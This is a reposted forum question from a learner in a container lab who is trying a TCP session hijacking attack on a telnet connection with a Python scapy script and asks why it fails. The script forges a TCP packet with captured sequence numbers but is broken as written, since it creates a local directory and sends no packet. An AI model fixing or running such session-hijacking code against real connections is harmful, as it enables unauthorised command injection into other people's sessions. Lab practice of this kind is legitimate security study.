如何解决Python TCP劫持攻击在Linux上创建目录
我打开了三个终端,并登录到客户端,服务器和攻击者容器。 从这里,我从客户端到服务器建立了telnet连接。 我使用wireshark找到了最新的TCP连接,并找到了下一个序列号和确认号。 使用这些代码,我编写了以下代码以在攻击者终端上运行,以劫持会话并在服务器上创建目录:
#!/usr/bin/python3
import sys
from scapy.all import *
import os
print("SENDING SESSION HIJACKING PACKET.........")
IPLayer = IP(src="10.4.0.2",dst="10.4.1.15")
TCPLayer = TCP(sport=46716,dport=23,flags="A",seq=2718986968,ack=1930649433)
directory = "Test"
os.mkdir(directory)
send(verbose=0)
这将返回以下错误:
root@attacker:~# python3 tcphijack.py
SENDING SESSION HIJACKING PACKET.........
Traceback (most recent call last):
File "tcphijack.py",line 12,in <module>
os.mkdir(directory)
FileExistsError: [Errno 17] File exists: 'Test'
root@attacker:~#
但是,当我运行以下代码时,我从服务器获得以下响应:
root@server:~# ls
mitm_dns.py sniff_dns.py spoof_dns.py
这些文件来自我正在练习的另一种攻击,但是未显示目录,但攻击者终端声称该目录已经存在。
任何帮助将不胜感激。
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。